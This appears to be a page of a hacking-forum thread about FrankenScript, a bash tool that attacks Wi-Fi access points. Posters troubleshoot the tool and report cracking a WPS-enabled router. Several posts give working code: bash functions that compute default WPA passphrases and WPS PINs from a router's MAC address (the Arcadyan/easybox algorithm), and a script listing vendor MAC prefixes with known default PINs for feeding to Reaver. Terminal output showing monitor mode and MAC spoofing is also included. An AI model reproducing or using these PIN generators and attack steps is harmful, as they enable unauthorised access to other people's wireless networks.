Page 2 of 10 FirstFirst 12345678910 LastLast
Results 51 to 100 of 493

Thread: FrankenScript by Slim76 - It Attacks Access Points and .pcap files

  1. #51
    Join Date
    2013-Jun
    Posts
    123
    Slim... We all know it not you... Breathe! LoL
    Upload to 0bin.net (thats a zero and then bin.net) great for all kinds of uses as its an encrypted pastebin
    Or use Dropbox if you want.

    You assembled a great script and we all want to access it.

  2. #52
    Join Date
    2013-Oct
    Posts
    321
    @ zimmaro

    Cheers for the suggestion mate, will look into it.

    @ brazen

    Cheers for the suggestion, will look into it too.
    Sorry it sounde like I was moaning/bitching at you, I wasn't, It's just how I talk/type. LOL

    @ flyinghaggis

    I'll run through the obvious first:
    1) Did you select you WiFi device?.
    2) Is your WiFi device listed under the main menu screen (Chosen Interface: wlan0)?.
    3) Did you enable attack mode?.
    4) Is attack mode listed under the main menu screen (System Mode: Attack Mode Enabled)?.
    5) Does mon0 have a MAC address listed under the main menu screen (MAC address for mon0)?.
    6) Is the temp folder in the FrankenScript directory empty?.

    Other possible causes could be:
    Sleep timing might need to be increased.
    Its possible that you might have double tapped the keyboard button, or held it down too long.

    If more people report issues I'll have to think about changeing the WiFi device detection, maybe the sleep timing, and maybe change the auto ENTER option to manual too.

    FrankenScript-v3.1
    UPDATED: 1/18/2014


    MDK3 - access point reset files are now deleted.
    Changed and added sleep timing.
    Changed WiFi device detection again.


    PasteBin:
    http://goo.gl/PzaT5t
    Last edited by slim76; 2014-01-18 at 15:45.

  3. #53
    Quote Originally Posted by slim76 View Post
    So has easy_box been fully implimented into WPSPIN?, If it has I'll remove easy_box from FrankenScript.
    No it isn't implemented yet in WPSPIN so you shouldn't remove easy_box but should correct this bug of a missing zero padding somewhere.

    cheers and may the force be with you and frankenscript.sh.

  4. #54
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by kcdtv View Post
    No it isn't implemented yet in WPSPIN so you shouldn't remove easy_box but should correct this bug of a missing zero padding somewhere.

    cheers and may the force be with you and frankenscript.sh.
    LOL, cheers dude.

    I'll be honest and say fixing that bug is probably beyond my knowledge at this point in time, maybe someone else who knows what they're doing could fix the issue for us.

  5. #55
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    Quote Originally Posted by slim76 View Post
    NOTE:
    If anyone knows of any other WPS default pin generaters please could you post them for me.
    Many thanks.
    http://packetstormsecurity.com/files...Generator.html
    Smile while you can for in the future there my be nothing to smile about.
    申し訳ありませんが、これは翻訳することができませんでした。

  6. #56
    Join Date
    2013-Oct
    Posts
    321
    Cheers matey, most greatful. :-)

    Do you know how to use it, does it use the standard mac of the AP (Openly broadcast)?, or does it use some other mac (Not broadcast)?.
    Cheers mate.

  7. #57
    Join Date
    2013-Jul
    Posts
    844
    We tried to get your download as a download file from your sites.We spent an hour and never got the file. We went to the pastbin site and captured the text for Version3.1 When we ran the program we got an error at line 105 and an error at line 1552. We captured the file three(3) times and ran it and got the same error. We cannot capture the error as the screen constrantly blinks and is refreshed. Line 105 is an illegal operation -s and line 1552 says read arg count

  8. #58
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by mmusket33 View Post
    We tried to get your download as a download file from your sites.We spent an hour and never got the file. We went to the pastbin site and captured the text for Version3.1 When we ran the program we got an error at line 105 and an error at line 1552. We captured the file three(3) times and ran it and got the same error. We cannot capture the error as the screen constrantly blinks and is refreshed. Line 105 is an illegal operation -s and line 1552 says read arg count
    Sorry to hear you're having trouble with it, did you change anything it the script?, or maybe you got some sort of corruption while downloading or copy and pasting.

    I'll be updating it again soon, I've made a few changes and added some new things.

  9. #59
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98

    Quote Originally Posted by slim76 View Post
    Cheers matey, most greatful. :-)

    Do you know how to use it, does it use the standard mac of the AP (Openly broadcast)?, or does it use some other mac (Not broadcast)?.
    Cheers mate.
    sorry i have no idea just found it while searching around.
    I also finally got around to test your version 1.3 of frankenscript i really like it cracked a wps enabled router but i do have one problem fsc.JPG when scanning for networks to collect a handshake your script dosent display the full name of the router. as you can see from my screenshot this could be a problem the suddenlink routers have some code that follows its name.
    Smile while you can for in the future there my be nothing to smile about.
    申し訳ありませんが、これは翻訳することができませんでした。

  10. #60
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by shaberu View Post
    sorry i have no idea just found it while searching around.
    I also finally got around to test your version 1.3 of frankenscript i really like it cracked a wps enabled router but i do have one problem fsc.JPG when scanning for networks to collect a handshake your script dosent display the full name of the router. as you can see from my screenshot this could be a problem the suddenlink routers have some code that follows its name.
    Sorry matey, I'll look into it and see if I can fix it for the next update.
    Does it contain any symbols or does it just consist of characters and digits?, Can you post an example ( Full broadcast essid ) please.

    Try this:

    Look in FrankenScript for the following lines:
    ----------------------------------------------------------------------

    ###### [4] Capture WPA/WPA2 Handshake ######
    4)
    cd $HOME/FrankenScript/temp
    clear
    echo $RED"Scan for possible targets."
    echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
    read -p $GREEN"Press [Enter] to start the scan.$STAND"

    xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0

    tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length: 0>/d' > temp0.txt
    cat temp0.txt | sed 's/^................................................. .........................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
    sleep 1

    PresentedAPs=$(cat PresentedAPs.txt)


    Change this line:
    ---------------------------

    cat temp0.txt | sed 's/^................................................. .........................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt

    Replace it with this line:
    --------------------------------------

    cat temp0.txt | awk '{ print $11 }' | nl -ba -w 1 -s ': ' > PresentedAPs.txt
    Last edited by slim76; 2014-01-28 at 13:31.

  11. #61
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    I tried your fix i didn't help but here is a screen shot of the networks suc.JPG
    Smile while you can for in the future there my be nothing to smile about.
    申し訳ありませんが、これは翻訳することができませんでした。

  12. #62
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by shaberu View Post
    I tried your fix i didn't help but here is a screen shot of the networks suc.JPG
    I can't see any reason why its doing what you say.
    The only thing I can think of is that the broadcast essid might have spaces in its name, I used the awk command to print columns so anything with a space would be a different column and wouldn't be printed on the screen.

  13. #63
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    They don't have any spaces i believe its caused by the period in there names because that's where it cuts off at
    Smile while you can for in the future there my be nothing to smile about.
    申し訳ありませんが、これは翻訳することができませんでした。

  14. #64
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by shaberu View Post
    They don't have any spaces i believe its caused by the period in there names because that's where it cuts off at
    Its strange cause you've tried two different commands.
    One command grepped for the last column, the other command deleted everything upto the begining of the essid (so the essid and everything after should have been printed).
    I'm still updating FrankenScript, it would have been done already if I hadn't deleted stuff that I shouldn't have. :-(

  15. #65
    Quote Originally Posted by slim76 View Post
    LOL, cheers dude.

    I'll be honest and say fixing that bug is probably beyond my knowledge at this point in time, maybe someone else who knows what they're doing could fix the issue for us.
    i made an update of wpspin and i implemented the algorithm corrected in bash in a function called aracadyan

    I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables
    You "feed it" with $BSSID which is the mac adress of the target in original format XX:XX:XX:XX:XX:XX
    It gives you back $DEFAULTWPA with the WPA passphrase and $STRING wich are the 7 numbers of the PIN
    than it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN )

    Code:
    ARCADYAN(){
    # WPSPIN 1.5 - GPL v 3  by kcdtv
    # This function uses three amazing works
    #   1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc 
    #   2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51
    #   3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com)
    # 
    # Thanks to the three of them for their dedication and passion and for deleivering full disclosure and free code
    # This function is based on the script easybox_keygen.sh previously mentioned
    # # The quotation from the original work start with double dash and are beetwen quotes
    # Some variables and line are changed for a better integration and I add the PIN calculation and Coeamn trick for default WPA  
    # the lines quoted with six dash and "unchanged"  are exactly the same than in easybox_keygen  like this "######unchanged" 
    
    
    # This function requires $BSSID which is the mac adress ( hex may format XX:XX:XX:XX:XX:XX)
    # It will return $DEFAULTSSID, with essid by default, the wpa passphrase ($DEFAULTWPA) and $STRING, the 7 first digit of our PIN, ready to use in CHECKSUM to
    # give the full WPS PIN ($PIN)
    
    ## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh
    deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) # supression of $take5 and $last4 compared with esaybox code, the job is directly done in the array value assignation, also the variable $MAC has been replaced by $BSSID taht is used in WPSPIN
    ## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh
    hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) ######unchanged
    ## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh
    ## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh
    c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})  ######unchanged
    c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})  ######unchanged
    K1=$((($c1)%16))  ######unchanged
    K2=$((($c2)%16))  ######unchanged
    X1=$((K1^${deci[3]}))  ######unchanged
    X2=$((K1^${deci[2]}))  ######unchanged
    X3=$((K1^${deci[1]}))  ######unchanged
    Y1=$((K2^0x${hexi[1]}))  ######unchanged
    Y2=$((K2^0x${hexi[2]}))  ######unchanged
    Y3=$((K2^0x${hexi[3]}))  ######unchanged
    Z1=$((0x${hexi[2]}^${deci[3]}))  ######unchanged
    Z2=$((0x${hexi[3]}^${deci[2]}))  ######unchanged
    Z3=$((K1^K2))  ######unchanged
    STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) # this to genrate later our PIN, the 7 first digit  
    DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1) # the change respected to the original script in the most important thing, the default pass, is the adaptation of Coeman76's work on spanish vodafone where he found out that no 0 where used in the final pass
    CHECKSUM
    }

    I put you back CHECKSUM in case it helps you

    Code:
    CHECKSUM(){                                                                  # The function checksum was written for bash by antares_145 form crack-wifi.com
    PIN=`expr 10 '*' $STRING`                                                    # We will have to define first the string $STRING (the 7 first number of the WPS PIN)
    ACCUM=0                                                                      # to get a result using this function)
                                                                 
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`       # multiplying the first number by 3, the second by 1, the third by 3 etc....
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`             # so we follow the pattern for our seven number
    
    DIGIT=`expr $ACCUM '%' 10`                                                   # we define our digit control: the sum reduced with base 10 to the unit number
    CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`                                 # the checksum is equal to " 10 minus  digit control "
    
    PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`)                             # Some zero-padding in case that the value of the PIN is under 10000000   
    }                                                                            # STRING + CHECKSUM gives the full WPS PIN


    feel free to use the code and if yiou have any question about it do not hesitate to ask


    cheers

  16. #66
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by kcdtv View Post
    i made an update of wpspin and i implemented the algorithm corrected in bash in a function called aracadyan

    I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables
    You "feed it" with $BSSID which is the mac adress of the target in original format XX:XX:XX:XX:XX:XX
    It gives you back $DEFAULTWPA with the WPA passphrase and $STRING wich are the 7 numbers of the PIN
    than it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN )

    feel free to use the code and if yiou have any question about it do not hesitate to ask

    cheers
    Nice work matey.
    I know you said feel free to ask any questions, but I was wondering if I could go a step further and ask if you would be able to correct the script for me please. :-)
    I'm sorry to ask, I'm still very new to this sort of thing. LOL
    If you can, please fee free to add any credits or such.

    Code:
    #!/bin/bash
    #
    #
    #
    #####################################################################
    
    AP_essid=$(cat $HOME/FrankenScript/Scripts/AP_essid.txt)
    AP_bssid=$(cat $HOME/FrankenScript/Scripts/AP_bssid.txt)
    ESSID=$(echo $AP_essid)
    BSSID=$(echo $AP_bssid)
    
    #####################################################################
    
    FUNC_CHECKSUM(){
    ACCUM=0
    
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
    
    DIGIT=`expr $ACCUM '%' 10`
    CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`
    
    PIN=`expr $PIN '+' $CHECKSUM`
    ACCUM=0
    
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`
    
    RESTE=`expr $ACCUM '%' 10`
     }
    
    CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
    
    FINBSSID=$(echo $BSSID | cut -d ':' -f4-)
    
    MAC=$(echo $FINBSSID | tr -d ':')
    
    CONVERTEDMAC=$(printf '%d\n' 0x$MAC)
    
    FINESSID=$(echo $ESSID | cut -d '-' -f2)
    
    PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')
    
    CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')
    
    MACESSID=$(echo $PAREMAC$FINESSID)
    
    STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
    
    PIN=`expr 10 '*' $STRING`
    
    FUNC_CHECKSUM
    
    PINWPS1=$(printf '%08d\n' $PIN)
    
    STRING2=`expr $STRING '+' 8`
    PIN=`expr 10 '*' $STRING2`
    
    FUNC_CHECKSUM
    
    PINWPS2=$(printf '%08d\n' $PIN)
    
    STRING3=`expr $STRING '+' 14`
    PIN=`expr 10 '*' $STRING3`
    
    FUNC_CHECKSUM
    
    PINWPS3=$(printf '%08d\n' $PIN)
    
    if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&  [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] &&  [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
    
    then
    
    CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)
    
    RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`
    
    STRING4=`expr $RAIZ '+' 7`
    
    PIN=`expr 10 '*' $STRING4`
    
    FUNC_CHECKSUM
    
    PINWPS4=$(printf '%08d\n' $PIN)
    
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4  "
    PIN4REAVER=$PINWPS4
    else
    case $CHECKBSSID in
    04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1  
    $RED"Other Possible Pin"$RED:$STAND $PINWPS2  
    $RED"Other Possible Pin"$RED:$STAND $PINWPS3"
    PIN4REAVER=$PINWPS1
    ;;
    001915)
    echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
    PIN4REAVER=12345670
    ;;
    404A03)
    echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
    PIN4REAVER=11866428
    ;;
    F43E61 | 001FA4)
    echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
    PIN4REAVER=12345670
    ;;
    001A2B)
    if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
    then
    echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
    PIN4REAVER=88478760
    else
    echo -e "PIN POSSIBLE... > $PINWPS1"
    PIN4REAVER=$PINWPS1
    fi
    ;;
    3872C0)
    if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
    then
    echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
    PIN4REAVER=18836486
    else
    echo -e "PIN POSSIBLE    > $PINWPS1"
    PIN4REAVER=$PINWPS1
    fi
    ;;
    FCF528)
    echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
    PIN4REAVER= 20329761
    ;;
    3039F2)
    echo -e "several possible PINs, ranked in order>  
     16538061 16702738 18355604 88202907 73767053 43297917"
    PIN4REAVER=16538061
    ;;
    A4526F)
    echo -e "several possible PINs, ranked in order>  
     16538061 88202907 73767053 16702738 43297917 18355604 "
    PIN4REAVER=16538061
    ;;
    74888B)
    echo -e "several possible PINs, ranked in order>  
     43297917 73767053 88202907 16538061 16702738 18355604"
    PIN4REAVER=43297917
    ;;
    DC0B1A)
    echo -e "several possible PINs, ranked in order>  
     16538061 16702738 18355604 88202907 73767053 43297917"
    PIN4REAVER=16538061
    ;;
    5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
    PIN4REAVER=$PINWPS1
    ;;
    002275)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    08863B)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    001CDF)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    00A026)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    5057F0)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    C83A35 | 00B00C | 081075)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    E47CF9 | 801F02)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    0022F7)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
    PIN4REAVER=$PINWPS1
    ;;
    *)
    PIN4REAVER=$PINWPS1
    ;;
    esac
    fi
    Last edited by slim76; 2014-01-30 at 03:09.

  17. #67
    you should collect the arcadyan mac to redact your case in condition

    Code:
    ;;
    XXXXXX | XXXXXX)
    where you have the X you put the 6 first digit of aracdyan the mac without the 2 points

    and then you generate string

    Code:
    deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) 
    hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) 
    c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})  
    c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})  
    K1=$((($c1)%16)) 
    K2=$((($c2)%16))  
    X1=$((K1^${deci[3]}))  
    X2=$((K1^${deci[2]}))  
    X3=$((K1^${deci[1]}))  
    Y1=$((K2^0x${hexi[1]}))  
    Y2=$((K2^0x${hexi[2]}))  
    Y3=$((K2^0x${hexi[3]})) 
    Z1=$((0x${hexi[2]}^${deci[3]}))  
    Z2=$((0x${hexi[3]}^${deci[2]}))  
    Z3=$((K1^K2))  
    STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
    than you generate the checksum to get the full PIN

    Code:
    PIN=`expr 10 '*' $STRING`
    FUNC_CHECKSUM
    PIN4REAVER=$(printf '%08d\n' $PIN)

    that will give you

    Code:
    ;;
    XXXXXX | XXXXXX)
    deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) 
    hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) 
    c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})  
    c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})  
    K1=$((($c1)%16)) 
    K2=$((($c2)%16))  
    X1=$((K1^${deci[3]}))  
    X2=$((K1^${deci[2]}))  
    X3=$((K1^${deci[1]}))  
    Y1=$((K2^0x${hexi[1]}))  
    Y2=$((K2^0x${hexi[2]}))  
    Y3=$((K2^0x${hexi[3]})) 
    Z1=$((0x${hexi[2]}^${deci[3]}))  
    Z2=$((0x${hexi[3]}^${deci[2]}))  
    Z3=$((K1^K2))  
    STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) 
    PIN=`expr 10 '*' $STRING`
    FUNC_CHECKSUM
    PIN4REAVER=$(printf '%08d\n' $PIN)

    taht you have to place in your case esac sentence, anywhere untill it is before
    Code:
    ;;
    *)

  18. #68
    Join Date
    2013-Oct
    Posts
    321
    Sorry mate I mean't would you be able to amend the script I posted so I only have to paste it back into FrankenScript.

    I know its kinda cheeky to ask, sorry. :-)

    I've been in stupid mode for the last few days and I'm having trouble following even simple things. LOL

  19. #69


    At least explain me more what you want to do, how you want to call the variables, where it is supposed to go, for what...
    you want to generate the PIN for all devices or just for arcadyan?
    ( it seems that the arcadyan algorithm is used by Askey on some models if i get confirmation of this i will post it here
    cheers

  20. #70
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by kcdtv View Post


    At least explain me more what you want to do, how you want to call the variables, where it is supposed to go, for what...
    you want to generate the PIN for all devices or just for arcadyan?
    ( it seems that the arcadyan algorithm is used by Askey on some models if i get confirmation of this i will post it here
    cheers
    Would it be possible to have it setup like the one I posted above (In a separate script), and have it generate the pin for all devices.
    Then I can put the script into a folder rather than putting it directly into FrankenScript.

    Many thanks matey.

  21. #71
    Join Date
    2013-Oct
    Posts
    321
    Updated FrankenScript to 3.2.

  22. #72
    Join Date
    2013-Jun
    Posts
    123
    Slim,

    at different points when I have to click [enter] to start a scan, a second terminal window opens then closes again quickly. I just downloaded 3.2 and it is still doing it.

  23. #73
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by brazen View Post
    Slim,

    at different points when I have to click [enter] to start a scan, a second terminal window opens then closes again quickly. I just downloaded 3.2 and it is still doing it.
    Can you provide more details please mate, I need to know exactly where it happens.

    If anyone else is having issues please post the details and I'll look into it.
    Last edited by slim76; 2014-02-06 at 23:17.

  24. #74
    Join Date
    2013-Jun
    Posts
    123
    root@kali:~# cd FrankenScript/
    root@kali:~/FrankenScript# ./FrankenScript.sh


    #########################################
    # FrankenScript #
    #########################################
    # #
    # [1] Interface Selection #
    # [2] System Mode Selection #
    # [3] Attack A WPS Enabled Access Point #
    # [4] Capture WPA/WPA2 Handshake #
    # [5] WEP Attacks #
    # [6] Attack Handshake.cap Files #
    # [7] Show Recovered Passkeys #
    # [8] Recovered Passkey Checker #
    # #
    #########################################

    Chosen Interface:
    System Mode: Networking Mode Is Enabled
    MAC address for mon0:

    Please choose an option?: 3




    Scan for WPS enabled access points.
    Press Ctrl+c on the wash screen to stop the scan and to choose a target.
    Press [Enter] to launch the scan.

    Please wait...

    [ I THINK THIS IS WHERE THE SECOND WINDOW OPENS FOR HALF A SECOND AND THEN CLOSES AND I AM BACK TO THE PRIMARY WINDOW]

















    Available Access Points.



    Please input the number of your chosen target:

  25. #75
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by brazen View Post
    root@kali:~# cd FrankenScript/
    root@kali:~/FrankenScript# ./FrankenScript.sh


    #########################################
    # FrankenScript #
    #########################################
    # #
    # [1] Interface Selection #
    # [2] System Mode Selection #
    # [3] Attack A WPS Enabled Access Point #
    # [4] Capture WPA/WPA2 Handshake #
    # [5] WEP Attacks #
    # [6] Attack Handshake.cap Files #
    # [7] Show Recovered Passkeys #
    # [8] Recovered Passkey Checker #
    # #
    #########################################

    Chosen Interface:
    System Mode: Networking Mode Is Enabled
    MAC address for mon0:

    Please choose an option?: 3

    Scan for WPS enabled access points.
    Press Ctrl+c on the wash screen to stop the scan and to choose a target.
    Press [Enter] to launch the scan.

    Please wait...

    [ I THINK THIS IS WHERE THE SECOND WINDOW OPENS FOR HALF A SECOND AND THEN CLOSES AND I AM BACK TO THE PRIMARY WINDOW]

    Available Access Points.

    Please input the number of your chosen target:
    Hmmm, did the wash scan work ok?.

  26. #76
    Join Date
    2013-Jun
    Posts
    123
    slim... this may just be me... see below... it worked correctly this time when i chose to disable processes that might cause issues: Y

    ********************************************

    Please choose an option?: 1




    Available WiFi Adapters.
    ########################

    1: wlan0

    Please input the number of your chosen WiFi adapter: 1


















    #########################################
    # FrankenScript #
    #########################################
    # #
    # [1] Interface Selection #
    # [2] System Mode Selection #
    # [3] Attack A WPS Enabled Access Point #
    # [4] Capture WPA/WPA2 Handshake #
    # [5] WEP Attacks #
    # [6] Attack Handshake.cap Files #
    # [7] Show Recovered Passkeys #
    # [8] Recovered Passkey Checker #
    # #
    #########################################

    Chosen Interface: wlan0
    System Mode: Networking Mode Is Enabled
    MAC address for mon0:

    Please choose an option?: 2




    What system mode would you like to set.
    [1] = Put The System Into Networking Mode.
    [2] = Put The System Into Attack Mode.
    [3] = Return To Menu.
    1, 2 or 3?: 2



















    Would you like to disable processes that might cause issues y/n?: y

    Would you like to disable NetworkManager y/n?: y

    Would you like to disable wpa_supplicant y/n?: y





















    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    3051 dhclient
    3057 dhclient


    Interface Chipset Driver

    wlan0 Broadcom b43 - [phy0]
    (monitor mode enabled on mon0)


    Permanent MAC: b8:8d:12:30:6b:f2 (unknown)
    Current MAC: b8:8d:12:30:6b:f2 (unknown)
    New MAC: 40:2d:60:68:79:8f (unknown)




    #########################################
    # FrankenScript #
    #########################################
    # #
